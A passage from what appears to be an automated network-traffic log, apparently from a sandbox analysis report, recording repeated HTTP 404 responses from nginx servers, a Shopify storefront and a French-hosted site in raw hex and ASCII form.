20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:30:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:30:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:30:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 17 Nov 2024 18:30:13 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:13 GMT; SameSite=LaxSet-Cookie: _shopify_y=08c3332e-958f-4436-bf19-c3821f6a126c; Expires=Sat, 16-Nov-24 18:30:13 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=2439e814-5c8f-4244-b5b5-edf4f5d196b0; Expires=Fri, 17-Nov-23 19:00:13 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=111X-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefronData Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:30:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 17 Nov 2024 18:30:16 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:16 GMT; SameSite=LaxSet-Cookie: _shopify_y=15d791bb-846b-4020-ba40-e965674e6ec6; Expires=Sat, 16-Nov-24 18:30:16 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=bcbef681-e64c-4235-a7a1-28580292fec8; Expires=Fri, 17-Nov-23 19:00:16 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=249X-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefronData Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: 293X-Sorting-Hat-ShopId: 83935199526Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-ShopId: 83935199526X-ShardId: 293Content-Language: en-USSet-Cookie: localization=US; path=/; expires=Sun, 17 Nov 2024 18:30:19 GMT; SameSite=LaxSet-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 18 Nov 2023 18:30:19 GMT; SameSite=LaxSet-Cookie: _shopify_y=8dcbed1e-473c-464f-8a46-bd774c138a8b; Expires=Sat, 16-Nov-24 18:30:19 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=cef691c9-523a-4a47-a245-713ac80fd67f; Expires=Fri, 17-Nov-23 19:00:19 GMT; Domain=littlehappiez.com; Path=/; SameSite=LaxServer-Timing: processing;dur=98X-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefrontData Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:30:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:30:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:31:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:31:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesData Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 